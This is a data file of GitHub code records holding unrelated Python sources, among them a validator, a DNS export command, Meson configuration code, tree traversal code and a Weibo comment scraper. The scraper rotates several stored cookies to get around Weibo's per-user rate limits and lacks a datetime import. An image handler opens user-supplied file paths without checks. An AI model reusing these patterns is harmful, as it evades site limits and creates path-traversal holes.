continue\n if marker not in valid_gates:\n # TODO - is this OK?\n continue\n expected_level = valid_gates[marker]\n if level == \"positive\" and expected_level in [\"high\", \"low\"]:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"INFO\",\n \"message\": f\"For this cell population, {marker_name_clean} has {expected_level} expression\",\n }\n )\n elif level in [\"high\", \"low\"] and expected_level == \"positive\":\n errors.append(\n {\n 
\"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"INFO\",\n \"message\": f\"For this cell population, {marker_name_clean} is positive, but not {level}\",\n }\n )\n elif level != expected_level:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"ERROR\",\n \"message\": f\"For this cell population, {marker_name_clean} must be {expected_level}\",\n }\n )\n return errors\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\"cell_names\", help=\"Cell Ontology IDs & labels/synonyms\")\n parser.add_argument(\"cell_levels\", help=\"Cell Ontology IDs & membrane parts\")\n parser.add_argument(\"gate_names\", help=\"Protein Ontology IDs & labels/synonyms\")\n parser.add_argument(\"input\", help=\"File to validate (cell populations & gates)\")\n args = parser.parse_args()\n errors = validate(args.cell_names, args.cell_levels, args.gate_names, args.input)\n if errors:\n writer = csv.DictWriter(\n sys.stdout,\n delimiter=\"\\t\",\n lineterminator=\"\\n\",\n fieldnames=[\"table\", \"cell\", \"level\", \"message\"],\n )\n writer.writeheader()\n writer.writerows(errors)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jamesaoverton/cell-name-and-marker-validator","sub_path":"src/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"8392495256","text":"#!/usr/bin/python3\n\nfrom datetime import datetime\nfrom models import storage\nimport uuid\n\n\nclass BaseModel:\n def __init__(self, *args, **kwargs) -> None:\n if len(kwargs) != 0:\n date_format = '%Y-%m-%dT%H:%M:%S.%f'\n for key, value in kwargs.items():\n if key == 'created_at' or key == 'updated_at':\n time = datetime.strptime(value, date_format)\n setattr(self, key, time)\n elif key != '__class__':\n setattr(self, key, value)\n else:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n storage.new(self)\n\n def __str__(self) -> str:\n return (f'[{self.__class__.__name__}] ({self.id}) {self.__dict__}')\n\n def save(self):\n self.updated_at = datetime.now()\n storage.save()\n\n def to_dict(self):\n upd_dict = {\n 'created_at': self.created_at.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'updated_at': self.updated_at.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n '__class__': self.__class__.__name__,\n }\n return {**self.__dict__, **upd_dict}\n","repo_name":"dkokonkwo/alu-AirBnB_clone","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17150177467","text":"import MapReduce\nimport sys\n\n\"\"\"\nMultiply Example in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\n\ndef mapper(record):\n if record[0] == 'a':\n for k in range(5):\n key = (record[1], k)\n value = (record[2], record[3])\n mr.emit_intermediate(key, value)\n else:\n for i in range(5):\n key = (i, record[2])\n value = (record[1], record[3])\n mr.emit_intermediate(key, value)\n\n\ndef reducer(key, value):\n count = 0\n for i in range(5):\n prod = []\n for item in value:\n if item[0] == i:\n prod.append(item[1])\n if len(prod) == 2:\n count += prod[0] * prod[1]\n mr.emit((key[0], key[1], count))\n\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","repo_name":"bhujyo/Data_science","sub_path":"MapReduce/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27781167819","text":"from googlecloudsdk.api_lib.dns import export_util\nfrom googlecloudsdk.api_lib.dns import util\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core.util import files\nfrom googlecloudsdk.third_party.apitools.base import py as apitools_base\n\n\nclass Export(base.Command):\n \"\"\"Export your record-sets into a file.\n\n This command exports the record-sets contained within the specified\n managed-zone into a file.\n \"\"\"\n\n detailed_help = {\n 'DESCRIPTION': '{description}',\n 'EXAMPLES': \"\"\"\\\n To export record-sets into a yaml file, run:\n\n $ {command} YAML_RECORDS_FILE -z MANAGED_ZONE\n\n To import record-sets into a zone file, run:\n\n $ {command} ZONE_FILE --zone-file-format -z MANAGED_ZONE\n \"\"\",\n }\n\n @staticmethod\n def Args(parser):\n parser.add_argument('records_file',\n help='File to which record-sets should be exported.')\n parser.add_argument(\n '--zone-file-format',\n required=False,\n action='store_true',\n help='Indicates that records-file should be in the zone file format.')\n\n @util.HandleHttpError\n def Run(self, args):\n dns = self.context['dns_client']\n messages = self.context['dns_messages']\n resources = self.context['dns_resources']\n project_id = properties.VALUES.core.project.Get(required=True)\n\n # Get the managed-zone.\n zone_ref = resources.Parse(args.zone, collection='dns.managedZones')\n try:\n zone = dns.managedZones.Get(zone_ref.Request())\n except apitools_base.HttpError as error:\n raise exceptions.HttpException(util.GetErrorMessage(error))\n\n # Get all the record-sets.\n record_sets = []\n for record_set in apitools_base.YieldFromList(\n dns.resourceRecordSets,\n messages.DnsResourceRecordSetsListRequest(project=project_id,\n managedZone=zone_ref.Name()),\n field='rrsets'):\n record_sets.append(record_set)\n\n # Export the record-sets.\n try:\n with files.Context(open(args.records_file, 'w')) as export_file:\n if args.zone_file_format:\n export_util.WriteToZoneFile(export_file, record_sets, zone.dnsName)\n else:\n export_util.WriteToYamlFile(export_file, record_sets)\n except Exception as exp:\n msg = 'unable to export record-sets to file [{0}]: {1}'.format(\n args.records_file, exp)\n raise exceptions.ToolException(msg)\n\n log.status.Print('Exported record-sets to [{0}].'.format(args.records_file))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/surface/dns/record_sets/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"}
+{"seq_id":"38118999305","text":"import json\n\nimport pytest\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom techtest.authors.models import Author\n\npytestmark = pytest.mark.django_db\n\n\ndef test_authors(client):\n # Test create / retrieve\n data = {\n \"first_name\": \"test_author_fn\",\n \"last_name\": \"test_author_ln\"\n }\n res = client.post('/authors/', data=data, content_type=\"application/json\")\n json_data = json.loads(res.content)\n author_id = json_data.get('id')\n assert res.status_code == 201\n assert json_data.get('first_name') == data['first_name']\n assert json_data.get('last_name') == data['last_name']\n assert Author.objects.get(id=json_data.get('id'))\n # Test retrieve\n res = client.get(f'/authors/{author_id}/')\n assert res.status_code == 200\n assert json_data.get('first_name') == data['first_name']\n assert json_data.get('last_name') == data['last_name']\n assert Author.objects.get(id=author_id)\n\n # Test list\n res = client.get('/authors/')\n json_data = json.loads(res.content)\n assert len(json_data) == 1\n assert json_data[0].get('first_name') == data['first_name']\n assert json_data[0].get('last_name') == data['last_name']\n\n # Test update\n updated_data = {\n \"first_name\": \"test_author_fn_update\",\n \"last_name\": \"test_author_ln_update\"\n }\n res = client.put(f'/authors/{author_id}/', data=updated_data, content_type='application/json')\n json_data = json.loads(res.content)\n assert res.status_code == 200\n assert json_data.get('first_name') == updated_data['first_name']\n assert json_data.get('last_name') == updated_data['last_name']\n\n # Test delete\n res = client.delete(f'/authors/{author_id}/')\n assert res.status_code == 200\n # Test if it was removed correctly\n with pytest.raises(ObjectDoesNotExist):\n Author.objects.get(id=author_id)\n\n # Test retrieve object that does not exist\n res = client.get('/authors/2/')\n assert res.status_code == 404\n\n\n\n\n\n\n","repo_name":"belingarb/djangotechtestmain","sub_path":"techtest/authors/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10377596805","text":"import os, subprocess\nimport typing as T\n\nfrom . import mesonlib\nfrom .mesonlib import EnvironmentException, MachineChoice, PerMachine, split_args\nfrom . import mlog\n\n_T = T.TypeVar('_T')\n\n\n# These classes contains all the data pulled from configuration files (native\n# and cross file currently), and also assists with the reading environment\n# variables.\n#\n# At this time there isn't an ironclad difference between this an other sources\n# of state like `coredata`. But one rough guide is much what is in `coredata` is\n# the *output* of the configuration process: the final decisions after tests.\n# This, on the other hand has *inputs*. The config files are parsed, but\n# otherwise minimally transformed. When more complex fallbacks (environment\n# detection) exist, they are defined elsewhere as functions that construct\n# instances of these classes.\n\n\nknown_cpu_families = (\n 'aarch64',\n 'alpha',\n 'arc',\n 'arm',\n 'avr',\n 'c2000',\n 'dspic',\n 'e2k',\n 'ia64',\n 'm68k',\n 'microblaze',\n 'mips',\n 'mips64',\n 'parisc',\n 'pic24',\n 'ppc',\n 'ppc64',\n 'riscv32',\n 'riscv64',\n 'rl78',\n 'rx',\n 's390',\n 's390x',\n 'sh4',\n 'sparc',\n 'sparc64',\n 'wasm32',\n 'wasm64',\n 'x86',\n 'x86_64',\n)\n\n# It would feel more natural to call this \"64_BIT_CPU_FAMILES\", but\n# python identifiers cannot start with numbers\nCPU_FAMILES_64_BIT = [\n 'aarch64',\n 'alpha',\n 'ia64',\n 'mips64',\n 'ppc64',\n 'riscv64',\n 's390x',\n 'sparc64',\n 'wasm64',\n 'x86_64',\n]\n\ndef get_env_var_pair(for_machine: MachineChoice,\n is_cross: bool,\n var_name: str) -> T.Tuple[T.Optional[str], T.Optional[str]]:\n \"\"\"\n Returns the exact env var and the value.\n \"\"\"\n candidates = PerMachine(\n # The prefixed build version takes priority, but if we are native\n # compiling we fall back on the unprefixed host version. 
This\n # allows native builds to never need to worry about the 'BUILD_*'\n # ones.\n ([var_name + '_FOR_BUILD'] if is_cross else [var_name]),\n # Always just the unprefixed host verions\n [var_name]\n )[for_machine]\n for var in candidates:\n value = os.environ.get(var)\n if value is not None:\n break\n else:\n formatted = ', '.join(['{!r}'.format(var) for var in candidates])\n mlog.debug('None of {} are defined in the environment, not changing global flags.'.format(formatted))\n return None\n mlog.log('Using {!r} from environment with value: {!r}'.format(var, value))\n return var, value\n\ndef get_env_var(for_machine: MachineChoice,\n is_cross: bool,\n var_name: str) -> T.Tuple[T.Optional[str], T.Optional[str]]:\n ret = get_env_var_pair(for_machine, is_cross, var_name)\n if ret is None:\n return None\n else:\n var, value = ret\n return value\n\nclass Properties:\n def __init__(\n self,\n properties: T.Optional[T.Dict[str, T.Union[str, T.List[str]]]] = None,\n ):\n self.properties = properties or {} # type: T.Dict[str, T.Union[str, T.List[str]]]\n\n def has_stdlib(self, language: str) -> bool:\n return language + '_stdlib' in self.properties\n\n # Some of get_stdlib, get_root, get_sys_root are wider than is actually\n # true, but without heterogenious dict annotations it's not practical to\n # narrow them\n def get_stdlib(self, language: str) -> T.Union[str, T.List[str]]:\n return self.properties[language + '_stdlib']\n\n def get_root(self) -> T.Optional[T.Union[str, T.List[str]]]:\n return self.properties.get('root', None)\n\n def get_sys_root(self) -> T.Optional[T.Union[str, T.List[str]]]:\n return self.properties.get('sys_root', None)\n\n def get_pkg_config_libdir(self) -> T.Optional[T.List[str]]:\n p = self.properties.get('pkg_config_libdir', None)\n if p is None:\n return p\n return mesonlib.listify(p)\n\n def __eq__(self, other: T.Any) -> 'T.Union[bool, NotImplemented]':\n if isinstance(other, type(self)):\n return self.properties == other.properties\n return NotImplemented\n\n # TODO consider removing so Properties is less freeform\n def __getitem__(self, key: str) -> T.Any:\n return self.properties[key]\n\n # TODO consider removing so Properties is less freeform\n def __contains__(self, item: T.Any) -> bool:\n return item in self.properties\n\n # TODO consider removing, for same reasons as above\n def get(self, key: str, default: T.Any = None) -> T.Any:\n return self.properties.get(key, default)\n\nclass MachineInfo:\n def __init__(self, system: str, cpu_family: str, cpu: str, endian: str):\n self.system = system\n self.cpu_family = cpu_family\n self.cpu = cpu\n self.endian = endian\n self.is_64_bit = cpu_family in CPU_FAMILES_64_BIT # type: bool\n\n def __eq__(self, other: T.Any) -> 'T.Union[bool, NotImplemented]':\n if self.__class__ is not other.__class__:\n return NotImplemented\n return \\\n self.system == other.system and \\\n self.cpu_family == other.cpu_family and \\\n self.cpu == other.cpu and \\\n self.endian == other.endian\n\n def __ne__(self, other: T.Any) -> 'T.Union[bool, NotImplemented]':\n if self.__class__ is not other.__class__:\n return NotImplemented\n return not self.__eq__(other)\n\n def __repr__(self) -> str:\n return ''.format(self.system, self.cpu_family, self.cpu)\n\n @classmethod\n def from_literal(cls, literal: T.Dict[str, str]) -> 'MachineInfo':\n minimum_literal = {'cpu', 'cpu_family', 'endian', 'system'}\n if set(literal) < minimum_literal:\n raise EnvironmentException(\n 'Machine info is currently {}\\n'.format(literal) +\n 'but is missing 
{}.'.format(minimum_literal - set(literal)))\n\n cpu_family = literal['cpu_family']\n if cpu_family not in known_cpu_families:\n mlog.warning('Unknown CPU family {}, please report this at https://github.com/mesonbuild/meson/issues/new'.format(cpu_family))\n\n endian = literal['endian']\n if endian not in ('little', 'big'):\n mlog.warning('Unknown endian {}'.format(endian))\n\n return cls(literal['system'], cpu_family, literal['cpu'], endian)\n\n def is_windows(self) -> bool:\n \"\"\"\n Machine is windows?\n \"\"\"\n return self.system == 'windows' or 'mingw' in self.system\n\n def is_cygwin(self) -> bool:\n \"\"\"\n Machine is cygwin?\n \"\"\"\n return self.system.startswith('cygwin')\n\n def is_linux(self) -> bool:\n \"\"\"\n Machine is linux?\n \"\"\"\n return self.system == 'linux'\n\n def is_darwin(self) -> bool:\n \"\"\"\n Machine is Darwin (iOS/tvOS/OS X)?\n \"\"\"\n return self.system in {'darwin', 'ios', 'tvos'}\n\n def is_android(self) -> bool:\n \"\"\"\n Machine is Android?\n \"\"\"\n return self.system == 'android'\n\n def is_haiku(self) -> bool:\n \"\"\"\n Machine is Haiku?\n \"\"\"\n return self.system == 'haiku'\n\n def is_netbsd(self) -> bool:\n \"\"\"\n Machine is NetBSD?\n \"\"\"\n return self.system == 'netbsd'\n\n def is_openbsd(self) -> bool:\n \"\"\"\n Machine is OpenBSD?\n \"\"\"\n return self.system == 'openbsd'\n\n def is_dragonflybsd(self) -> bool:\n \"\"\"Machine is DragonflyBSD?\"\"\"\n return self.system == 'dragonfly'\n\n def is_freebsd(self) -> bool:\n \"\"\"Machine is FreeBSD?\"\"\"\n return self.system == 'freebsd'\n\n def is_sunos(self) -> bool:\n \"\"\"Machine is illumos or Solaris?\"\"\"\n return self.system == 'sunos'\n\n def is_hurd(self) -> bool:\n \"\"\"\n Machine is GNU/Hurd?\n \"\"\"\n return self.system == 'gnu'\n\n def is_irix(self) -> bool:\n \"\"\"Machine is IRIX?\"\"\"\n return self.system.startswith('irix')\n\n # Various prefixes and suffixes for import libraries, shared libraries,\n # static libraries, and executables.\n # Versioning is added to these names in the backends as-needed.\n def get_exe_suffix(self) -> str:\n if self.is_windows() or self.is_cygwin():\n return 'exe'\n else:\n return ''\n\n def get_object_suffix(self) -> str:\n if self.is_windows():\n return 'obj'\n else:\n return 'o'\n\n def libdir_layout_is_win(self) -> bool:\n return self.is_windows() or self.is_cygwin()\n\nclass BinaryTable:\n def __init__(\n self,\n binaries: T.Optional[T.Dict[str, T.Union[str, T.List[str]]]] = None,\n ):\n self.binaries = binaries or {} # type: T.Dict[str, T.Union[str, T.List[str]]]\n for name, command in self.binaries.items():\n if not isinstance(command, (list, str)):\n # TODO generalize message\n raise mesonlib.MesonException(\n 'Invalid type {!r} for binary {!r} in cross file'\n ''.format(command, name))\n\n # Map from language identifiers to environment variables.\n evarMap = {\n # Compilers\n 'c': 'CC',\n 'cpp': 'CXX',\n 'cs': 'CSC',\n 'd': 'DC',\n 'fortran': 'FC',\n 'objc': 'OBJC',\n 'objcpp': 'OBJCXX',\n 'rust': 'RUSTC',\n 'vala': 'VALAC',\n\n # Linkers\n 'c_ld': 'CC_LD',\n 'cpp_ld': 'CXX_LD',\n 'd_ld': 'DC_LD',\n 'fortran_ld': 'FC_LD',\n 'objc_ld': 'OBJC_LD',\n 'objcpp_ld': 'OBJCXX_LD',\n 'rust_ld': 'RUSTC_LD',\n\n # Binutils\n 'strip': 'STRIP',\n 'ar': 'AR',\n 'windres': 'WINDRES',\n\n # Other tools\n 'cmake': 'CMAKE',\n 'qmake': 'QMAKE',\n 'pkgconfig': 'PKG_CONFIG',\n } # type: T.Dict[str, str]\n\n # Deprecated environment variables mapped from the new variable to the old one\n # Deprecated in 0.54.0\n DEPRECATION_MAP = {\n 'DC_LD': 
'D_LD',\n 'FC_LD': 'F_LD',\n 'RUSTC_LD': 'RUST_LD',\n 'OBJCXX_LD': 'OBJCPP_LD',\n } # type: T.Dict[str, str]\n\n @staticmethod\n def detect_ccache() -> T.List[str]:\n try:\n subprocess.check_call(['ccache', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n except (OSError, subprocess.CalledProcessError):\n return []\n return ['ccache']\n\n @classmethod\n def parse_entry(cls, entry: T.Union[str, T.List[str]]) -> T.Tuple[T.List[str], T.List[str]]:\n compiler = mesonlib.stringlistify(entry)\n # Ensure ccache exists and remove it if it doesn't\n if compiler[0] == 'ccache':\n compiler = compiler[1:]\n ccache = cls.detect_ccache()\n else:\n ccache = []\n # Return value has to be a list of compiler 'choices'\n return compiler, ccache\n\n def lookup_entry(self,\n for_machine: MachineChoice,\n is_cross: bool,\n name: str) -> T.Optional[T.List[str]]:\n \"\"\"Lookup binary in cross/native file and fall back to the environment.\n\n Returns the command with args as a list if found, or `None` if nothing is\n found.\n \"\"\"\n # Try the explicit map first, then fall back to env vars\n for _ in [()]: # a trick to get `break`\n raw_command = self.binaries.get(name)\n if raw_command is not None:\n command = mesonlib.stringlistify(raw_command)\n break # found\n evar = self.evarMap.get(name)\n if evar is not None:\n raw_command = get_env_var(for_machine, is_cross, evar)\n if raw_command is None:\n deprecated = self.DEPRECATION_MAP.get(evar)\n if deprecated is not None:\n raw_command = get_env_var(for_machine, is_cross, deprecated)\n if raw_command is not None:\n mlog.deprecation(\n 'The', deprecated, 'environment variable is deprecated in favor of',\n evar, once=True)\n if raw_command is not None:\n command = split_args(raw_command)\n break # found\n command = None\n\n # Do not return empty or blank string entries\n if command is not None and (len(command) == 0 or len(command[0].strip()) == 0):\n command = None\n return command\n\nclass Directories:\n\n \"\"\"Data class that holds information about directories for native and cross\n builds.\n \"\"\"\n\n def __init__(self, bindir: T.Optional[str] = None, datadir: T.Optional[str] = None,\n includedir: T.Optional[str] = None, infodir: T.Optional[str] = None,\n libdir: T.Optional[str] = None, libexecdir: T.Optional[str] = None,\n localedir: T.Optional[str] = None, localstatedir: T.Optional[str] = None,\n mandir: T.Optional[str] = None, prefix: T.Optional[str] = None,\n sbindir: T.Optional[str] = None, sharedstatedir: T.Optional[str] = None,\n sysconfdir: T.Optional[str] = None):\n self.bindir = bindir\n self.datadir = datadir\n self.includedir = includedir\n self.infodir = infodir\n self.libdir = libdir\n self.libexecdir = libexecdir\n self.localedir = localedir\n self.localstatedir = localstatedir\n self.mandir = mandir\n self.prefix = prefix\n self.sbindir = sbindir\n self.sharedstatedir = sharedstatedir\n self.sysconfdir = sysconfdir\n\n def __contains__(self, key: str) -> bool:\n return hasattr(self, key)\n\n def __getitem__(self, key: str) -> T.Optional[str]:\n # Mypy can't figure out what to do with getattr here, so we'll cast for it\n return T.cast(T.Optional[str], getattr(self, key))\n\n def __setitem__(self, key: str, value: T.Optional[str]) -> None:\n setattr(self, key, value)\n\n def __iter__(self) -> T.Iterator[T.Tuple[str, str]]:\n return 
iter(self.__dict__.items())\n","repo_name":"SoftwareGuy/stealthChamp-qemu","sub_path":"meson/mesonbuild/envconfig.py","file_name":"envconfig.py","file_ext":"py","file_size_in_byte":14287,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"}
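The lookup order implemented by BinaryTable.lookup_entry above (explicit [binaries] entry first, then the language's environment variable, then its deprecated alias) can be sketched standalone. A minimal illustration only, not Meson's API; EVAR_MAP and DEPRECATION_MAP below are trimmed, partly hypothetical stand-ins for the tables above.

import os
import shlex

EVAR_MAP = {'c': 'CC', 'c_ld': 'CC_LD'}  # subset of evarMap above
DEPRECATION_MAP = {'CC_LD': 'C_LD'}      # hypothetical deprecated alias, for the demo only

def lookup(binaries, name):
    # 1) an explicit entry from the cross/native file wins
    raw = binaries.get(name)
    if raw is not None:
        return raw if isinstance(raw, list) else shlex.split(raw)
    # 2) fall back to the env var, then 3) to its deprecated alias
    evar = EVAR_MAP.get(name)
    if evar is not None:
        raw = os.environ.get(evar) or os.environ.get(DEPRECATION_MAP.get(evar, ''))
        if raw:
            return shlex.split(raw)
    return None

os.environ['CC'] = 'ccache gcc'
print(lookup({}, 'c'))                # ['ccache', 'gcc'] -- from the environment
print(lookup({'c': ['clang']}, 'c'))  # ['clang'] -- explicit entry wins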
+{"seq_id":"13155075701","text":"\"\"\"最终版2018/11/27(修改了只能爬最新的 不能爬'昨天'的评论内容 测试表示微博限制单个用户访问频次较严重 本次添加了五个Cookie)\"\"\"\r\nimport requests\r\nimport json\r\nimport re\r\nimport ceshi.cookies as ck\r\nimport random\r\nimport aiohttp\r\nimport asyncio\r\nclass Wb_Comment:\r\n def __init__(self,url):\r\n self.headers = {\r\n 'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Mobile Safari/537.36',\r\n 'Cookie':random.choice(ck.cookies)\r\n }\r\n self.url = url\r\n self.comment_list = []\r\n p1 = re.compile(r'.*/(.*)', re.S)\r\n cuturl = re.findall(p1, self.url)\r\n self.mid = cuturl[0]\r\n def get_frist(self):\r\n url = 'https://m.weibo.cn/comments/hotflow?id={0}&mid={0}&max_id_type=0'.format(self.mid)\r\n response = requests.get(url,headers=self.headers).text\r\n html = json.loads(response)\r\n items = html['data']['data']\r\n for item in items:\r\n ID = item['id']\r\n Name = item['user']['screen_name']\r\n Content = item['text']\r\n Agree = item['like_count']\r\n Time = item['created_at']\r\n self.comment_list.append({'ID': ID, 'Name': Name, 'Content': Content,'Agree':Agree, 'Time': Time})\r\n next_id = html['data']['max_id']\r\n return next_id\r\n async def get_next(self):\r\n maxid = self.get_frist()\r\n while 1:\r\n url = 'https://m.weibo.cn/comments/hotflow?id={0}&mid={0}&max_id={1}&max_id_type=0'.format(self.mid,maxid)\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(url,headers=self.headers) as pagehtml:\r\n response = await pagehtml.text(\"utf-8\", \"ignore\")\r\n html = json.loads(response)\r\n items = html['data']['data']\r\n for item in items:\r\n ID = item['id']\r\n Name = item['user']['screen_name']\r\n Content = item['text']\r\n Agree = item['like_count']\r\n Time = item['created_at']\r\n timeArray = datetime.datetime.strptime(Time, '%a %b %d %H:%M:%S +0800 %Y')\r\n otherStyleTime = timeArray.strftime(\r\n '%Y/%m/%d %H:%M:%S') # 评论时间 Tue Nov 20 12:39:24 +0800 2018 转为 2018/11/20 12:39:24 格式\r\n self.comment_list.append({'ID': ID, 'Name': Name, 'Content': Content, 'Agree': Agree, 'Time': otherStyleTime})\r\n maxid = html['data']['max_id']\r\n if maxid == 0:\r\n break\r\n def main(self):\r\n asyncio.set_event_loop(asyncio.new_event_loop())\r\n loop = asyncio.get_event_loop()\r\n loop.run_until_complete(self.get_next())\r\n loop.close()\r\n # wb_commment_dict = {'最新评论': len(self.comment_list)}\r\n wb_commment_dict = {'最新评论': self.comment_list,'type': 'weibo'}\r\n # print(wb_commment_dict)\r\n return wb_commment_dict\r\n\r\n\r\n","repo_name":"mango941231/Python-webspider","sub_path":"Crawl_WB_Commentasyncio.py","file_name":"Crawl_WB_Commentasyncio.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"16377991600","text":"class Node:\n def __init__(self, value, left, right):\n self.value = value\n self.left = left\n self.right = right\n\n\nclass BinaryTree:\n def __init__(self, array):\n node_list = [Node(value, None, None) for value in array]\n for ind, node in enumerate(node_list):\n left = 2 * ind + 1\n right = 2 * ind + 2\n if left < len(node_list):\n node.left = node_list[left]\n if right < len(node_list):\n node.right = node_list[right]\n\n self.root = node_list[0]\n\n def preorder(self):\n s = ''\n def recursive(node):\n nonlocal s\n s += str(node.value) + ' '\n if node.left:\n recursive(node.left)\n if node.right:\n recursive(node.right)\n\n s = '['\n recursive(self.root)\n s += ']'\n print(s)\n \n def inorder(self):\n s = ''\n def recursive(node):\n nonlocal s\n if node.left:\n recursive(node.left)\n s += str(node.value) + ' '\n if node.right:\n recursive(node.right)\n\n s = '['\n recursive(self.root)\n s += ']'\n print(s)\n \n def postorder(self):\n s = ''\n def recursive(node):\n nonlocal s\n if node.left:\n recursive(node.left)\n if node.right:\n recursive(node.right)\n s += str(node.value) + ' '\n\n s = '['\n recursive(self.root)\n s += ']'\n print(s)\n\n def bfs(self, value):\n queue = []\n isFound = False\n queue.append(self.root)\n\n while queue:\n node = queue[0]\n del queue[0]\n if node.value == value:\n isFound = True\n return isFound\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n return isFound\n \n def dfs(self, value):\n isFound = False\n def recursive(node):\n nonlocal isFound\n if node.value == value:\n isFound = True\n return\n if isFound is True:\n return\n if node.left is not None:\n recursive(node.left)\n if node.right is not None:\n recursive(node.right)\n \n recursive(self.root)\n return isFound\n\n\ntree = BinaryTree([i for i in range(13)])\ntree.preorder()\ntree.inorder()\ntree.postorder()\n\nprint(tree.dfs(4))\nprint(tree.dfs(11))\n\nprint(tree.bfs(6))\nprint(tree.bfs(17))","repo_name":"hodduck-v/algorithm_nklcb1","sub_path":"0326/binary_tree_node.py","file_name":"binary_tree_node.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12460095273","text":"from PIL import Image\nfrom cStringIO import StringIO\nimport os\n\nos.chdir(os.path.dirname(__file__))\n\ndef index(req,image,**opts):\n\tdir = './'\n\n\ts = StringIO()\n\ttypes = ['gif','jpg','png']\n\n\t# Open image\n\timg = Image.open(dir+image);\n\n\t# Default size \n\tsize = list(img.size)\n\n\tif opts.has_key('width'):\n\t\tsize[0] = int(opts['width'])\n\tif opts.has_key('height'):\n\t\tsize[1] = int(opts['height'])\n\n\tsize = tuple(size)\n\t# Scale image \n\tif size != img.size:\n\t\timg.thumbnail(size,Image.ANTIALIAS)\n\n\tformat = img.format\n\tif opts.has_key('format') and opts['format'] in types:\n\t\tformat = opts['format']\n\n\tif format == 'jpg':\n\t\tformat = 'jpeg'\n\n\timg.save(s,format)\n\n\treq.content_type = 'image/'+format\n\timg = s.getvalue()\n\ts.close()\n\treturn img\n","repo_name":"Joshua2504/regnum-maps-old","sub_path":"beta/images/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40201893059","text":"# -*- coding: utf-8 -*-\n\nimport collections\n\nfrom copy import deepcopy\n\n\ndef _get_deep_attr(obj, attr):\n for path in attr.split(\".\"):\n try:\n obj = getattr(obj, path)\n except AttributeError: \n return None\n return obj\n\ndef json_transform(obj, attrs_tree, extend=None):\n result = {}\n for attr in attrs_tree:\n _attr = attr.split(\"-\")[0]\n val = attrs_tree[attr]\n \n if isinstance(val, dict): # val is a map\n objarray = getattr(obj, _attr)\n val = deepcopy(val)\n sort_key = val.pop(\"$_sort_key_$\") if \"$_sort_key_$\" in val else None\n filter_funct = val.pop(\"$filter$\") if \"$filter$\" in val else (lambda e: True)\n result[attr] = list()\n if sort_key: \n objarray = sorted(objarray, key=sort_key) \n for item in objarray:\n if filter_funct(item): result[attr].append(json_transform(item, attrs_tree=val))\n \n elif isinstance(val, (list, tuple)): # val is list\n columns = val\n objarray = getattr(obj, _attr)\n \n result[attr] = {}\n result[attr][\"$RECORDS$\"] = []\n \n functs, formats, list_attrs, _columns = [], [], [], []\n for col in columns: \n list_attrs.append(col[\"$attr\"])\n formats.append(col[\"$format\"] if \"$format\" in col else None)\n functs.append(col[\"$funct\"] if \"$funct\" in col else None)\n _columns.append(dict([ (k, col[k]) for k in col if k != '$funct']))\n \n for item in objarray:\n row = []\n for idx, col in enumerate(columns):\n l_attr = list_attrs[idx]\n funct = functs[idx]\n fmat = formats[idx]\n raw_value = _get_deep_attr(item, l_attr)\n value = funct(raw_value) if (funct is not None) else (fmat % (raw_value,) if raw_value is not None else \"\") if (fmat is not None) else raw_value\n row.append(value)\n result[attr][\"$RECORDS$\"].append(row)\n \n result[attr][\"$COLUMNS$\"] = _columns\n elif callable(val):\n funct = val\n field_value = funct( _get_deep_attr(obj, _attr) )\n result[attr] = field_value \n else:\n fmat = attrs_tree[attr]\n field_value = _get_deep_attr(obj, _attr)\n result[attr] = field_value if fmat is None else (fmat %(field_value, ) if (field_value is not None) else None)\n if extend:\n result.update(extend)\n return 